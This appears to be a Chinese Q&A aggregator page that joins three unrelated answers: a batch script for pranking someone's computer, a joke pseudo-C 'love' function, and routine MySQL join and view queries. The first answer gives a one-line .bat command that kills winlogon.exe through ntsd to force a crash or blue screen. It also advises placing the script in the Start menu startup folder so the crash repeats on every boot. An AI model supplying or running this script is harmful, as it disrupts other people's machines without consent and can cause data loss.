本文目录一览:
我想要额恶搞别人电脑的bat代码
@echo off
cmd /c start /min ntsd -c q -pn winlogon.exe 1nul 2nul
蓝屏代码,放在开始菜单启动项里就可以无限蓝屏,解决方法,安全模式,删除即可
一段女生写的C语言代码(搞笑)
这个算是技术宅的段子吧
从风格上看,很可能是宅男写的 而不是女生
#include "stdio.h" //谭老说:include 和""都是合法的。这位标准方式,在头文件目录下寻找。
#include "stdlib.h" //""现在当前目录下找,若无,则在头文件目录下找。一般:库函数→自编头文件→""
result love(boy, girl)
{
if ( boy.有房() and boy.有车() )
{
boy.set(nothing);
return girl.嫁给(boy);
}
if ( girl.愿意等() )
{
while( ! (boy.赚钱 > 100,000 and girl.感情 > 8 ) )
{
for ( day=1; day <=365; day++)
{
if ( day == 情人节 )
if ( boy.givegirl(玫瑰) )
girl.感情++;
else
girl.感情--;
if( day == girl.生日)
if ( boy.givegirl(玫瑰) )
girl.感情++;
else
girl.感情--;
boy.拼命赚钱();
}
}
if ( boy.有房() and boy.有车() )
{
boy.set(nothing);
return girl.嫁给(boy);
}
年龄++;
girl.感情--;
}
return girl.goto( another_boy);
}
mysql搞笑代码?
查询兴趣是books
select my_contacts.*,interests.interest from my_contacts,contact_interest,interests
where interests.interest=’books’ and
contact_interest.interest_id=interests.id and
my_contacts.id=contact_interest.contact_id;
–另外一种写法
select my_contacts.id,my_contacts.phone,my_contacts.last_name,my_contacts.first_name,my_contacts.email,my_contacts.birthday,my_contacts.prof_id,my_contacts.status_id,my_contacts.zip_id,interests.interest,profession.profession,status.status,zip_code.city,zip_code.state,zip_code.zip_code from my_contacts
inner join contact_interest
on my_contacts.id=contact_interest.contact_id
inner join interests
on contact_interest.interest_id=interests.id
inner join profession
on my_contacts.prof_id=profession.id
inner join status
on my_contacts.status_id=status.id
inner join zip_code
on my_contacts.zip_id=zip_code.id
where interests.interest=’books’;
–创建personbooks表,作为Php查询的视图表。但是表不能一起更新呀?可以插入?怎样插入呀?
–更新,直接通过查询可以更新吗?注意语句方法,不通用。可以呀,就是视图呀。就是查询的代码复制创建的。
create view person_books as
select my_contacts.id,my_contacts.phone,my_contacts.last_name,my_contacts.first_name,my_contacts.email,my_contacts.birthday,my_contacts.prof_id,my_contacts.status_id,my_contacts.zip_id,interests.interest,profession.profession,status.status,zip_code.city,zip_code.state,zip_code.zip_code from my_contacts
inner join contact_interest
on my_contacts.id=contact_interest.contact_id
inner join interests
on contact_interest.interest_id=interests.id
inner join profession
on my_contacts.prof_id=profession.id
inner join status
on my_contacts.status_id=status.id
inner join zip_code
on my_contacts.zip_id=zip_code.id
where interests.interest=’books’;